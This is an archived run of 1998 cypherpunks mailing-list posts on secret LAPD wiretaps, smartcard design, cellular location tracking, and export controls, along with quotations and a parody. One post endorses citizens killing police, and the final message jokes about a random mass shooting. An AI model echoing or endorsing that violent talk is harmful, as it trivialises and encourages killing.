knowingly violated the 4th Amendments's prohibition against
unreasonable search and seizure is one that cannot be resolved in
court: Can the county's criminal-justice system carry on in an
atmosphere of mistrust? 

...

LAPD officers have avoided revealing the existence of their
electronic intercepts using a police procedure known as "the handoff
technique." It works like this: Narcotics officers on "Team A" set up
a wiretap to gather information on a suspect. Without identifying the
source of their information, the officers turn over the wiretap's
"intelligence product" to detectives from "Team B," also members of
LAPD's narcotics unit. Using the intelligence product, "Team B"
officers set about trying to gather facts independently that would
provide "probable cause" for a second judge to sign a search warrant
targeting another suspect, without the cops disclosing the existence of
the first wiretap to the jurist. 
It is not hard to imagine the potential harm from this
police-prosecution malfeasance. If an investigation focused on a
pharmacist, for instance, the police would have a taped record of
every prescription for every patient and physician who called the
pharmacy. By law, these wiretaps are preserved for 10 years, so the
potential damage to an innocent citizen having his or her private calls
intercepted is significant. 

What aggravates the misconduct is the likelihood that neither the
police nor the "wiretap judge" followed the legal requirement that the
police file written progress reports every 72 hours, and that the judge
make a decision every 72 hours on whether a tap can continue.
There is strong reason to suspect that neither the judiciary nor the
Legislature has been "minding the store." For example, a judge issuing
a wiretap order must inform any person whose voice was
wiretapped within 90 days and supply the person with an inventory of
what was recorded. Similarly, Atty. Gen. Dan Lungren is required to
provide a detailed report to the Legislature and state Judicial Council
each April regarding the number and duration of all wiretaps
conducted by every law-enforcement agency in the state. As of last
week, neither the Judicial Council nor Chairman John Vasconcellos'
Senate Public Safety Committee could find a copy. 
Finally, no public defender or private criminal lawyer has been given
the legally required inventory since 1985, when the secret wiretaps
began. According to Public Defender Michael P. Judge, the public
record discloses only three reported wiretaps by local law
enforcement during 1997--two by the LAPD and one by the county
Sheriff's Department. It is simply mind-boggling that, for the last 13
years, on hundreds of occasions when the court or opposing counsel
have asked prosecutors whether they have turned over all
defendants' and co-defendants' statements, they have been lied to or
misled. 
The danger from these secret wiretaps is not limited to suspected
criminals. According to statistics published by the Administrative
Office of the United States Courts, which oversees "authorized"
federal wiretaps, each wiretap order of roughly 40 days in length
results in the interception of an average 2,139 conversations involving
84 separate persons. The statistics also note that the average tap
produces incriminating information less than 20% of the time,
resulting in the arrest of two suspects and the conviction of a single
individual. If, as a police narcotics detective testified in the Gaxiola
case, there have been hundreds of secret "handoff" taps and
electronic intercepts, by extrapolation, thousands of Los Angeles
residents have had their private telephone conversations secretly and
illegally monitored by LAPD. 
The public defender has filed an unprecedented class-action habeas
corpus petition with Superior Court Presiding Judge Robert W. Parkin
on behalf of all past, present and future public defender clients. It
seeks to discover whether the prosecution denied thousands of
defendants a fair trial by hiding the true source of its information, i.e.,
secret wiretaps. If secret wiretaps were used and the evidence was
concealed from the defense, then thousands of men and women were
illegally convicted and incarcerated. 
Should this unhappy scenario play out, the criminal justice system
could well be irreparably damaged, its credibility in the public mind
ruined. Yet, even if events keep the convicted behind bars, the loss of
trust between prosecutor and defense lawyer may never be fully
recovered. The problem defense lawyers and criminal judges face
today is that they have never had so many prosecutors lie for so long
about so much, which may have resulted in the unconstitutional
convictions of so many. 

http://www.latimes.com/sbin/iawrapper?NS-search-set=/3544b/aaaa004Kx44b35f&N
S-doc-offset=0&NS-adv-search=0&
------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

"I actually thought Silicon Valley was where women went to get fixed."
		---LA Mayor Richard Riordan 98.02.19




	










	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@alum.mit.edu>
Date: Mon, 27 Apr 1998 09:44:12 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Schneier on Smartcards and Holding Secrets
Message-ID: <3.0.5.32.19980427094340.007b3500@otc.net>
MIME-Version: 1.0
Content-Type: text/plain


	
Bruce wrote a short letter to a trade mag (Internet world? I've
lost it since) worth reporting.  The jist was, if a smartcard
contains Bank Secrets but is held by customers which do not
share the same goals/responsibility as the owner of the secrets, this is 
*poor security design*.




------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

"I actually thought Silicon Valley was where women went to get fixed."
		---LA Mayor Richard Riordan 98.02.19




	










	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@replay.com>
Date: Mon, 27 Apr 1998 14:06:51 -0700 (PDT)
To: cypherpunks@toad.com
Subject: ID's
Message-ID: <3544B67B.20DF@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


"When a place gets crowded enough to require ID's, social collapse is
not far away. It is time to go elsewhere."
~ Robert Heinlein






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CustomNews@INTMAIL.TURNER.COM
Date: Mon, 27 Apr 1998 08:15:26 -0700 (PDT)
To: TEXTCUSTOMNEWSUPDATE@CNNIMAIL1.CNN.COM
Subject: CNN Custom News Update
Message-ID: <199804271453.KAA14685@belize>
MIME-Version: 1.0
Content-Type: text/plain


Greetings and thanks for using CNN Custom News, the most
complete personalized news service on the Web.  We want to let
you know about some of the exciting improvements that we've
made to the site.  If you haven't visited the service recently,
be sure to check out these latest upgrades at:

http://CNN.com/CustomNews

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>*<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
CNN CUSTOM NEWS HAS 2000 NEW CATEGORIES and NEW SOURCES
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>*<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

News is not "personalized" unless you can specifically target
your interests. Since June 4th, 1997, we've added nearly 2,000
categories to CNN Custom News, including a variety of
space-related subjects, more country-specific international
categories and additional entertainment articles.  Our total
number of categories now numbers more than 2,200!

And don't forget that CNN Custom News has over 100 information
sources from which to draw.  Just this week, the Environmental
News Network has begun supplying Custom News with stories to
further expand your perspective on the news.  Now go in-depth,
no matter where your area of interest lies!


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>*<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
ALL YOUR TEAMS' SCORES ARE CONVENIENTLY ON ONE PAGE
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>*<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

Do you follow Minor League Baseball?  How about Arena Football?
Custom News will keep you up-to-date with the news and scores
from all of your favorite teams whether they are college, major
or minor league.

If soccer is your thing, you won't be left out.  CNN Custom News
enables you to keep track of soccer country by country.  You can
also follow diverse sports such as cricket, rugby or Formula One
racing, all from your personalized sports page.


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>*<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
CNN CUSTOM NEWS IS FASTER - 75 TECHNICAL IMPROVEMENTS
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>*<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

As a result of our technical partnership with Oracle, over 75
software and design improvements have been implemented in our
computer server farm during the past eight months to improve
Custom News' performance. We know that Custom News saves you
time and we're striving to make your experience as fast and
reliable as possible.  Try us again and see the difference.


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>*<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
GO THROUGH YOUR DAY WITH A SMILE - DON'T MISS 'ALT'
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>*<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

The CNN Custom News Team has created a new section called "alt".
Here you'll find a selection of comics, horoscopes, games and
off-key topics such as UFOs and pets.  There is no better way to
pick up your day!


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>*<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
CNN CUSTOM NEWS TIP:  REMOVING THE JAVA TICKER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>*<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

The CNN News Stream scrolling Java ticker provides a convenient
way to view your personalized news headlines, sports scores and
stock prices.  But if you would like your Custom News pages to
load more quickly, you can remove the CNN News Stream ticker.
Simply click on the "Change Custom Profile" button, scroll to
the bottom of the page and click on the CNN News Stream option.
Select "none" for the ticker location, then "save and exit."
You'll be on your way to a faster loading homepage!


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>*<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
WHAT IF I'VE FORGOTTEN MY PASSWORD?
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>*<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
If you have not used the service in a while or are on a new
computer, you may need to enter your user name and password.
If you can remember your user name, but forgot your password,
the system will prompt you with the reminder message you
created at the time of registration. The reminder will appear
directly above your login name.

If you have forgotten both your user name and password, simply
open a new account with our QuickStart Profile option.  It's
fast and easy to start using CNN Custom News again!


Thanks for your time.  If you haven't already, come by
CNN.com/CustomNews and check out the improved Custom News
service.

Sincerely,

The CNN Custom News Team
http://cnn.com/CustomNews


=============================================================
If you would rather not receive future updates about Custom News
features and events, please go to
http://customnews.cnn.com/cnews/pna_auth.register and
uncheck the "new Custom News features" checkbox.

If you cannot access the above page, but would like to be
unsubscribed from this list, please go to
http://cnn.com/EMAIL/customnews/ and enter your e-mail address.

Please DO NOT respond to this e-mail.






CNN Interactive email id:14658105300104631




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@replay.com>
Date: Mon, 27 Apr 1998 14:05:11 -0700 (PDT)
To: cypherpunks@toad.com
Subject: TruthBore
Message-ID: <3544B850.1420@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


"The opposite of a profound truth may well be another profound truth."
~ Bohr






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@replay.com>
Date: Mon, 27 Apr 1998 14:05:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: ...and we're here to screw you...
Message-ID: <3544B8A4.443D@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


"We don't care. We don't have to. We're the phone company."
~ An Opus To Be Named Later






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@replay.com>
Date: Mon, 27 Apr 1998 14:05:36 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Defense
Message-ID: <3544B8FE.2B55@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


"The best defense against logic is ignorance."
~ A(H)OL(E)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@replay.com>
Date: Mon, 27 Apr 1998 14:05:41 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Son of Fear
Message-ID: <3544B9B5.E6E@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


"Message will arrive in the mail. Destroy before the FBI sees it."
~ FUD D'is






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@replay.com>
Date: Mon, 27 Apr 1998 14:05:48 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Weapons
Message-ID: <3544B9F8.5FF3@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Armadillo: To provide weapons to a Spanish pickle.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 27 Apr 1998 09:53:24 -0700 (PDT)
To: cypherpunks@toad.com
Subject: UK E-Comm-Crypto Policy
Message-ID: <199804271653.MAA13529@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


The UK DTI issued today a policy statement and papers
on electronic commerce and encryption policy, which 
were posted to UK Crypto. We offer the initial three docs:

   http://jya.com/uk-ecomm.htm  (28K)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@replay.com>
Date: Mon, 27 Apr 1998 14:07:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Justice
Message-ID: <3544F494.654@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


"Justice is incidental to law and order."
~ J. Edgar Hoover





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marty Levy" <rwww60@email.sps.mot.com>
Date: Mon, 27 Apr 1998 07:19:21 -0700 (PDT)
To: Phil Karn <karn@qualcomm.com>
Subject: Re: Position escrow
In-Reply-To: <199804220153.SAA22662@servo.qualcomm.com>
Message-ID: <354493E1.ADF25AFD@email.sps.mot.com>
MIME-Version: 1.0
Content-Type: text/plain





> I think you guys are worried about the wrong problem.
>
> The E911 stuff is still years off. Even when it is deployed, it will
> probably work only during a call, though this may depend on the exact
> method.
>
> In my opinion, idle cell registrations -- which are already standard
> cellular system practice -- represent the far more serious privacy
> threat.
>

It's worse than you think.  Most cellular base stations serve 7 cells,
and each cell uses receive diversity (mutiple antennas for the same
cell).  There is also a designed overlap of the cells from basestation
to basestation, otherwise you get blackout spots.  Although the
effort to use this information to locate a certain phone (provided
the power is on) is not trivial, the hardware is all in place.  Right
now, the basestation must determine which cell the user is in, but
the capability exists for it to narrow down the location and send
that information back to the network.  It probably won't (easily)
have the resolution of GPS, but once you know that much, you
can just home in on the phone's signal.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Wedgwood <chris@cybernet.co.nz>
Date: Sun, 26 Apr 1998 21:12:17 -0700 (PDT)
To: Phil Karn <frantz@netcom.com
Subject: Re: Position escrow
In-Reply-To: <v03110713b16406e293aa@[207.94.249.80]>
Message-ID: <19980427161120.A3217@caffeine.ix.net.nz>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, Apr 22, 1998 at 01:49:24PM -0700, Phil Karn wrote:
> Somebody should point out to the carriers that they could get rid of
> much of the incentive to clone phones if they simply offered a
> legit way to remain anonymous.

Bellsouth do that here, sort of, with GSM SIMs. 

You buy SIMs with 'pre-pay' on them and after a certain amount of air time
have to buy another one. Presumably these are regular SIMs and the expirey
is done by the network.

There should be lots of these SIMs around in theory... can anyone say STM?

Check out http://www.bellsouth.co.nz/prepay/prepay.htm for details.



-Chris




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Avi Rubin <rubin@research.att.com>
Date: Mon, 27 Apr 1998 17:37:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: IEEE newsletter on Security & Privacy
Message-ID: <199804280035.UAA08887@mgoblue.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain


This is to inform people who are interested of the 
IEEE Computer Society's Technical Committee on Security
and Privacy's newsletter, CIPHER. The URL for the online
version can be found at

   http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/

There is also a text version of the newsletter mailed out to
the mailing list about every two months. You can find subscription 
information as well as the current and back issues at the web
site.

Here is the table of contents of the April issue:

====================================================================
Newsletter of the IEEE Computer Society's TC on Security and Privacy
Electronic Issue 27                                 April 27, 1998
Avi Rubin and Paul Syverson, Editors
                                       Bob Bruen, Book Review Editor
                                        Hilarie Orman, Assoc. Editor
                                     Mary Ellen Zurko, Assoc. Editor
                                      Anish Mathuria, Reader's Guide
====================================================================
         http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/
 
Contents:                                         [3354 lines total]
 o  Letter from the TC Chair
 o  Letter from the Editor
Final Program and Registration Information for the
   1998 IEEE Symposium on Security and Privacy, Oakland California USA
Preliminary Program of the
   1998 IEEE Computer Security Foundations Workshop, Rockport Mass. USA
Security and Privacy Survey by the IEEE Computer Society
Security and Privacy News Briefs:
 o LISTWATCH: Items from security-related lists, by Mary Ellen Zurko
 o An Update from Asia, by Yongfei Han
 o Report on Canadian Crypto Policy Framework for Electronic Commerce,
   by Stewart Baker and  Elizabeth Banker
 o More recent news on Canadian Crypto Policy Framework
   and other policy news
 o Denial of service attacks targeting Windows 95/NT machines
 o Employees buy ORA Canada
Commentary and Opinion: Book Reviews
 o Web Security. A Step-by-step Reference Guide.
   by Lincoln Stein, reviewed by Bob Bruen
Conference Reports:
 o Workshop on Education in Computer Security (WECS '98) by Cynthia Irvine
 o Computers, Freedom, and Privacy (CFP `98) by Danielle Gallo
 o Financial Cryptography (FC`98) by Paul Syverson
 o NSA Network Security Framework Forum (NSFF) by Jeremy Epstein
Assessment of security software
New reports available via FTP and WWW: a couple
New Interesting Links on the Web
Who's Where: recent address changes
Calls for Papers:  HASE, ACSAC, IEEE Internet Computing, Software Practice
                   & Experience, JCS, ACM RBAC
Reader's guide to recent security and privacy literature
 o Conference Papers: Paper lists for FC, NDSS, and Info. Hiding
 o Journal and Newsletter articles: several
Calendar
List of Computer Security Academic Positions, maintained by Cynthia Irvine
Publications for sale -- CSFW proceedings available
TC officers
Information for Subscribers and Contributors



*********************************************************************
Aviel D. Rubin                                 rubin@research.att.com
Secure Systems Research Dept.                Adjunct Professor at NYU
AT&T Labs - Research
180 Park Avenue                   http://www.research.att.com/~rubin/
Florham Park, NJ 07932-0971                    Voice: +1 973 360-8356
USA                                            FAX:   +1 973 360-8809

   --> Check out http://www.clark.net/pub/mjr/websec/ for a new
       book on web security (The Web Security Sourcebook).
*********************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <paulmerrill@acm.org>
Date: Mon, 27 Apr 1998 17:37:21 -0700 (PDT)
To: tm@replay.com
Subject: Re: ID's
In-Reply-To: <3544B67B.20DF@replay.com>
Message-ID: <35454EF6.91A42838@acm.org>
MIME-Version: 1.0
Content-Type: text/plain


It is never entirely safe nor fittin' to attribute the words put in a
characters mouth by an author to the author.  Lazarus Long, the
character in question, while having many fine qualities, was not the
type of person who could be depended upon to tven follow his own
judgement nor one that could be trusted anyfurther than you could throw
Him. 

But in this case, I do believe that it did reflect RAH's views quite
well.

PHM

TruthMonger wrote:
> 
> "When a place gets crowded enough to require ID's, social collapse is
> not far away. It is time to go elsewhere."
> ~ Robert Heinlein




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Illuminatus Primus <vermont@gate.net>
Date: Mon, 27 Apr 1998 17:41:39 -0700 (PDT)
To: Jonathan Wienke <JonWienk@ix.netcom.com>
Subject: Re: Position escrow (and how to defeat it)
In-Reply-To: <3.0.3.32.19980422104042.02f10a40@popd.netcruiser>
Message-ID: <Pine.LNX.3.96.980427192424.24362A-100000@oto.gate.net>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 22 Apr 1998, Jonathan Wienke wrote:

> 
> Regardless of the type of phone, the cell stations can be designed to do
> time-of-arrival comparisons on the signal transmitted from the phone and
> calculate a reasonably accurate position.  If you don't want your location
> known, don't transmit.
> 

Or, delay the return signal and use a paraboloid reflector.  This would
limit a spy's knowledge to the angle from the tower that you were
transmitting from, and the maximum distance from the tower that you could
be sitting at.  The paraboloid reflector would limit the ability for
someone to triangulate your location, depending on how narrow the beam is
focused.. Of course, if they really wanted to find you, they would walk
along the line of transmission until they ran right into you :).

Sure, the average joe is not going to go to the trouble of modifying his
cell phone and using a paraboloid reflector.. and even if he did, a
remailer type of system would be much more secure.  I guess the average
unaware joe is just going to have to get used to being shafted as a result
of his ignorance.  Isn't that how it's always been?

Question: How could true anarchy be guaranteed for stupid people like Joe?
>From an atheistic viewpoint, it could be said that the natural state of
the universe is anarchy; the current situation is a result of that
anarchy.

What me worry..





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ddt@lsd.com
Date: Tue, 28 Apr 1998 02:18:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: kid informers
Message-ID: <v04100400b16b4177ce61@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


 http://www.odci.gov/cia/ciakids/aerial/index.html

 "Hi, kids! My name is Harry Recon, and this is my twin sister, Aerial.
  She's going to tell you about the History of the CIA in another section
  of the kid's page. We know some great books, too! Read all about it!
  My parents named me after President Harry Truman, who created the Central
  Intelligence Agency when he signed the National Security Act on Sept. 18,
  1947. My family has always supported the Agency and its predecessor, the
  Office of Strategic Services (OSS), roosting wherever it was camped and
  keeping an eye out in defense of our country, too.

  In 1961, when the Agency moved from downtown Washington, DC, to Langley,
  Virginia, we naturally followed. My dad says that we Recons have been in
  the intelligence operations business throughout US history:

  With Paul Revere on his midnight ride.
  With Virginia Hall as she arrived in France during World War II.
  Winging along side the U-2 as it took off to gather overhead pictures.

  Let Aerial tell you more about where we live and work and about our
  family history."

 http://www.nytimes.com/library/national/042398cia-kids.html

 "This is not an effort to recruit," a spokesman for the spy agency
	emphasizes. "This is an effort to inform in a fun way."


I wonder what genius came up with this idea.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 28 Apr 1998 00:31:47 -0700 (PDT)
To: shamrock@cypherpunks.to (Lucky Green)
Subject: Re: Schneier on Smartcards and Holding Secrets
In-Reply-To: <Pine.BSF.3.96.980428042345.7685E-100000@pakastelohi.cypherpunks.to>
Message-ID: <199804280729.DAA03637@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
| On Mon, 27 Apr 1998, David Honig wrote:
| 
| > 	
| > Bruce wrote a short letter to a trade mag (Internet world? I've
| > lost it since) worth reporting.  The jist was, if a smartcard
| > contains Bank Secrets but is held by customers which do not
| > share the same goals/responsibility as the owner of the secrets, this is 
| > *poor security design*.
| 
| No kidding. Duh.

I make this point by saying 'if the smartcard is my agent, its useful.
If its the bank's agent--well, its under my complete control, isn't
it?'


Adam

-- 
Just be thankful that Microsoft does not manufacture pharmaceuticals.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Mon, 27 Apr 1998 18:53:46 -0700 (PDT)
To: David Honig <honig@alum.mit.edu>
Subject: Re: Schneier on Smartcards and Holding Secrets
In-Reply-To: <3.0.5.32.19980427094340.007b3500@otc.net>
Message-ID: <Pine.BSF.3.96.980428042345.7685E-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 27 Apr 1998, David Honig wrote:

> 	
> Bruce wrote a short letter to a trade mag (Internet world? I've
> lost it since) worth reporting.  The jist was, if a smartcard
> contains Bank Secrets but is held by customers which do not
> share the same goals/responsibility as the owner of the secrets, this is 
> *poor security design*.

No kidding. Duh.

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Tue, 28 Apr 1998 15:58:47 -0700 (PDT)
To: David Honig <honig@alum.mit.edu>
Subject: Re: Schneier on Smartcards and Holding Secrets
In-Reply-To: <3.0.5.32.19980427094340.007b3500@otc.net>
Message-ID: <3545DC4C.6468@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


David Honig wrote:
> 
> 
> Bruce wrote a short letter to a trade mag (Internet world? I've
> lost it since) worth reporting.  The jist was, if a smartcard
> contains Bank Secrets but is held by customers which do not
> share the same goals/responsibility as the owner of the secrets, this is
> *poor security design*.

LEA's in Montreal (?) just raided a place churning out a wide variety
of Lucky Green Freelance Socialist Smartcards (TM).
It seems that the Electronic Horatio Algers involved simply bought the
same type of equipment that banks,etc., use, and placed hidden cameras
in business areas where charge/debit cards were used.
The LEAs spoke about millions of dollars worth of fraud, but I don't
think they were including possible losses by secret government agencies
skimming private funds for black-bag jobs and illegal arms deals.

  The 'criminals' will probably turn out to be ex-employees of the
Oliver North Campaign Fund Drive.

Toto






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Tue, 28 Apr 1998 15:57:07 -0700 (PDT)
To: David Honig <honig@alum.mit.edu>
Subject: Re: LA DA's illegal wiretaps revealed ---LA Times
In-Reply-To: <3.0.5.32.19980427094006.007bcb60@otc.net>
Message-ID: <3545DDD8.1865@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


David Honig wrote:
> [excerpt]
> in the wake of the discovery that
> deputy district attorneys assigned to its narcotics unit have relied on
> secret wiretaps for years to gather evidence against their
> clients--and no one, including judges, knew about the practice.

The same thing occurs in my hometown of 10,000 people. When the
local cops get caught performing criminal actions, the city buys
their way out of a lawsuit, with a non-disclosure agreement being
signed, and the illegal activity continues, as before.
No one knows? Bullshit. Even the local barhounds know. Don't tell
me the judges and prosecuters are clueless.

There are criminals with guns and badges, and criminals without
guns and badges.
I am in favor of the government exercising their power to enforce
the death penalty. I am equally in favor of the individual citizen
doing the same.

TRIN






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Tue, 28 Apr 1998 15:57:40 -0700 (PDT)
To: "Edwin E. Smith" <edsmith@IntNet.net>
Subject: Re: Futures Doomed
In-Reply-To: <199804261554.LAA13050@camel7.mindspring.com>
Message-ID: <3545E35C.5570@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Edwin E. Smith wrote:
> 
> At 09:32 PM 4/26/98 -0400, you wrote:
> >Why haven't the undergrounders adopted the SF1000 note (just under $700
> these days)?  Nice denomination. 
> When was the last time you bought $700 worth of crack? :-)

Yesterday...

Anonymous






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris L. Kuszmaul" <fyodor@nas.nasa.gov>
Date: Tue, 28 Apr 1998 08:16:16 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NASA 'educating' scientists to restrict free speech.
Message-ID: <199804281515.IAA22897@sally.nas.nasa.gov>
MIME-Version: 1.0
Content-Type: text/plain



  Hi, my name is Chris Kuszmaul. I am a contractor at NASA
Ames research center. I feel it would be valuable for the general
scientific community to be aware of some upcoming classes 
designed to educate scientists here regarding what they may and
may not write on the internet, or any public forum.
-------------------- begin excerpt --------------------
NASA has begun responding to recent new legislation and regulations
regarding the export of information or material with potential use as a
weapon of mass destruction or international business competitiveness
advantage. All personnel creating information, equipment or material
falling within this category are now responsible to control its transfer
according to regulations.  NASA has created an Export Control
Administrator at each Center responsible to implement a program which
provides for the review, classification and approval (or disapproval) of
the export of material or information which may be subject to
limitations.

The Center has arranged for the outreach program offices of the U.S.
Customs and the Bureau of Export Administration (BXA), U.S. Department
of Commerce, to conduct a brief class on their Agency's regulatory
requirements in partial fulfilment of this required training. Everyone
is welcome to attend, but this is a mandatory briefing for researchers,
engineers and equipment developers. This session will deal with the
enforcement of the Export Administration Regulations (EAR), issues of
the Commerce Control List (CCL), and Export Classification Control
Number (ECCN). This particular session covers the regulatory requirement
for the authors of scientific, technical materials and software
developers. Anyone who generates and develops such materials, or sends
NASA commodities overseas must attend this session.  These specifically
include NRC, Ames Associates, grant recipients, students, IPA's,
contractors, civil service employees and all others who publish on
behalf of NASA. The EAR, CCL, ECCN are important in completing block III
of the Document Availability Authorization (DAA)(Form 1676).

Each session will be approximately 15-20 minutes.  A question and answer
session will follow after the talk.

The dates, time, and location are indicated below. Attendance at one
session is sufficient to fulfill the regulatory requirements.

                      Dates           Time
    Location

    May 7, 1998      10 am      Bldg. 213, Rm 261

....

---------------------------------------

  As the text above says, everybody is welcome to attend.

CLK




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: x <x@x.com>
Date: Tue, 28 Apr 1998 08:43:40 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: NASA 'educating' scientists to restrict free speech.
Message-ID: <3.0.32.19691231160000.0072bbf4@shell15.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain


Thank you - chilling.  Anyone have specifics on the "legislation"? and
regulations, especially concerning "potential use as a weapon of ...
international business advantage?"

At 08:15 AM 4/28/98 -0700, Chris L. Kuszmaul wrote:
>
>
>  Hi, my name is Chris Kuszmaul. I am a contractor at NASA
>Ames research center. I feel it would be valuable for the general
>scientific community to be aware of some upcoming classes 
>designed to educate scientists here regarding what they may and
>may not write on the internet, or any public forum.
>-------------------- begin excerpt --------------------
>NASA has begun responding to recent new legislation and regulations
>regarding the export of information or material with potential use as a
>weapon of mass destruction or international business competitiveness
>advantage. All personnel creating information, equipment or material
>falling within this category are now responsible to control its transfer
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@alum.mit.edu>
Date: Tue, 28 Apr 1998 09:04:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: kid informers
In-Reply-To: <v04100400b16b4177ce61@[192.187.167.52]>
Message-ID: <3.0.5.32.19980428085530.007a23e0@otc.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:03 AM 4/28/98 -0700, ddt@lsd.com wrote:
> "This is not an effort to recruit," a spokesman for the spy agency
>	emphasizes. "This is an effort to inform in a fun way."
>

One can only hope that some bored cynic can perhaps generate
a parody page which expresses the truth.  And seed the 
META-CONTENT with enough k-12 keywords to snag the eyeballs.

"Hi, I'm Dorothy Lemming, and I work for the intelligence community.
We listen to your calls to your granny in the old country, 
we scan your email, we get our Canadian buddies to listen to you
and teach them how to share.
We like to know what you're saying.  Its our way of 
getting in touch with your feelings."

"Hi, my name is Louie, and I like to listen too.  We're trying
to point out all the scary monsters to your parents so they will 
let us do whatever we want.  So that we can protect you.  What's
a little privacy for safety?"

"Hi, my name is Aldrich Ames, and my job is to make sure all our
spies work for us..."


------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

"I actually thought Silicon Valley was where women went to get fixed."
		---LA Mayor Richard Riordan 98.02.19




	










	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eat Shit <DaveNull@hotmail.com>
Date: Tue, 28 Apr 1998 15:57:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Your Opinion Matters...
Message-ID: <3545F6BF.65D3@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


I think I should walk into a Luby's Cafeteria and start blowing people
away at random, for no good reason.
~ If you agree, vote by dialing 1-800-EAT-SHIT
